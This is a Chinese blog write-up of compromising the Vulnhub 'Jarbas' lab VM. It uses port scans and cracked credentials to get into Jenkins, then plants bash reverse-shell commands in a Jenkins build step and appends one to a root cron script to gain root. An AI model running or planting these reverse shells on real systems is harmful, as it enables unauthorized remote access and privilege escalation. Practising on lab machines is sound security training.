首页 > 其他分享 >打靶记录-Jarbas

打靶记录-Jarbas

时间:2024-11-08 09:56:54浏览次数:1  
标签:8080 52.130 记录 端口 打靶 192.168 Jarbas msf 靶机

靶机下载

vulnhub -> Jarbas

确定靶机

nmap -sn 192.168.52.0/24

靶机ip:192.168.52.130

扫描全端口开放情况

nmap -sT 192.168.52.130 -p- -oA ./ports

详细扫开放的端口

nmap -sT -sC -sV -O 192.168.52.130 -p22,80,3306,8080 -oA ./details

扫udp端口开放

nmap -sU --top-ports 20 192.168.52.130

使用漏洞脚本扫描

nmap --script=vuln -p22,80,3306,8080 192.168.52.130 -oA ./vuln

渗透顺序

靶机中开放22,80,3306,8080端口,分别对应服务ssh,http,mysql,http。个人习惯的顺序是3306,8080,80,22.

3306渗透

mysql -h 192.168.52.130 -u root -p

不允许远程登录

web渗透

浏览器访问192.168.52.130:8080

Jenkins ver. 2.113直接去找nday看看
searchsploit Jenkins
只用看rce的,那些xss打靶机肯定是用不上了

因为都是msf的脚本,先去msf目录下新建个文件夹来装。

cd /usr/share/metasploit-framework/modules/exploits
mkdir selfmake
cd selfmake
searchsploit -m 46572
searchsploit -m 46352


启动msf,加载脚本

msfconsole
reload_all
search 46352


use exploit/selfmake/46352
show options

设置参数

寄了,要登录,估计是个后台洞

试试另一个,好像也不行。先去看看80端口
访问http://192.168.52.130

点了一下没交互的地方,直接扫目录看看
dirsearch -u http://192.168.52.130 -r

扫出两个html,拼接访问看看

access.html里面有用户名跟密码的哈希,去cmd5查一下。全部查出来了

tiago:italia99
trindade:marianna
eder:vipsu

现在就可以回去尝试登录8080端口的web服务了
最后凭借eder:vipsu成功登进web
现在回去msf使用46352看看能不能rce,设置用户名密码

利用成功但没有建立会话,玉玉。还是手动连一下好了。

破案了,上去管理页面看了一下执行记录,是因为靶机上没nc。

msf设置payload使用bash反弹shell,不是啊,怎么msf里面没有单纯用bash反弹shell的payload


msf试了几个payload都不行,还是手动弹一下好了
攻击机开启监听

点击web后台连攻击机



bash -i >& /dev/tcp/192.168.52.129/7777 0>&1

再点击build now拿到shell

提权

尝试suid提权,查询所有有suid权限的文件
find / -perm -4000 -type f 2>/dev/null

有crontab跟pkexec,这两个印象中都是可以提权的。尝试了pkexec提权,靶机中没gcc,没办法编译
cat /etc/crontab

发现了一个root权限每5分钟执行一次的脚本
cat /etc/script/CleaningScript.sh

一个日志清理脚本,尝试往里写反弹命令。写之前先开本地监听nc -lvvp 4444
echo "bash -i >& /dev/tcp/192.168.52.129/4444 0>&1" >> /etc/script/CleaningScript.sh
已经写进去了,等5分钟,等shell弹回来


cat /root/flag.txt

参考

https://www.bilibili.com/video/BV1jm4y1A7Tm
https://blog.csdn.net/Bossfrank/article/details/131017549

标签:8080,52.130,记录,端口,打靶,192.168,Jarbas,msf,靶机
From: https://www.cnblogs.com/dg05/p/18534044

相关文章

  • ansible 运维技巧记录
    ansible运维技巧记录1.指定配置文件ansible -i /etc/ansible/hosts KD1 -m shell -a ‘uptime‘ansible-i/root/shiye/hkhostten-mshell-a'uptime'ansible-i/root/shiye/hkhostten-mshell-a'uptime'|awk'{print$1,$3}'|xargs2.非22端口如......
  • LeetCode HOT 100 记录
    目录230.二叉搜索树中第K小的元素-力扣(LeetCode)199.二叉树的右视图-力扣(LeetCode)230.二叉搜索树中第K小的元素-力扣(LeetCode)相当于把二叉搜索树从小到大排序,而二叉搜索树有一个特点,就是顺序左子树<根节点<右子树,因此可以考虑使用中序遍历/***Definitionfo......
  • sql注入学习记录
    Sql注入思路1、搜索目标通过谷歌语法(如公司inurl:.asp?id=)查找目标网站通过fofaviewer进行查询目标 2、查找注入点存在位置,参数与数据库交互的地方,可能出现在get参数,post参数,user-agent,cookie等地方 3、测试是否存在注入点通过在参数后添加符号’,”,),)),查看页面是否......
  • 【记录分享】多任务黑客攻击仿真模拟器
     在电影和电视剧中,黑客攻击的场景往往充满了紧张、快速的打字声和不断滚动的命令行界面。为了让这种体验更具沉浸感,我们可以通过编程模拟出一个真实的黑客攻击过程。本篇文章将介绍如何使用Python和Tkinter库设计一个多任务黑客攻击仿真模拟程序,包含攻击模拟、网络带宽......
  • 记录大佬的思路
    洛谷染色问题,即2024CSP-S第三题。原题复述:给定一个长度为n的正整数数组A,其中所有数从左至右排成一排。你需要将A中的每个数染成红色或蓝色之一,然后按如下方式计算最终得分:设C为长度为n的整数数组,对于A中的每个数左侧没有与其同色的数,则令Ci=0。否则,记其左侧与其最......
  • 11月7日 NOIP模拟(难题math、矩阵游戏matrix、括号序列seq、道路road) - 模拟赛记录
    PrefaceT1试图找规律失败,正经推反而几分钟就出来了。以后应该少想这些歪门邪道(除非实在闲的蛋疼或者没有一点头绪,且必须要打完所有能打的子任务比如暴力或特殊性质;而且必须在用常规方法思考过后,才能够用一些稍微不那么常规的方法)至于T2、T3、T4,因为知道T1浪费了太多时间,都是......
  • 学习openeuler操作系统的记录本
    1.下载以及配置openeuler在官网里面下载openeuler操作系统,在官网的文档里面里面查看相对应的注意事项,(一定要会阅读官方文档),在官网查看下载的对应操作系统需要的最小cpu,以及磁盘大小等分配合适的虚拟硬盘,配置的过程要一步一步来,防止出现分配不合理,而导致的操作系统无法正常运行的......
  • [考试记录] 2024.11.7 noip模拟赛7
    基础暴力分300pts......
  • 时代峰峻讲课费进口量法撒旦记录卡;个发电量开发建设
    #include<bits/stdc++.h>#defineintlonglong#definefifirst#definesesecond#definepiistd::pair<int,int>#defineebemplace_back#definepbpush_backtypedeflonglongll;typedefunsignedlonglongull;std::mt19937myrand(std::chrono:......
  • 【vjudge训练记录】11月个人训练赛2
    训练情况赛后反思A题看错题导致我红温了,C题数组开小又导致我红温了,D题循环太早结束了,导致小数据没答案,我又红温了,F题刚好越界RE了,我又红温了,G题用string会RE,换成char数组就过了。今天全场都在失误红温。。。A题这题是找\(N\timesN\)的字符矩阵中是否包含\(M\timesM\)......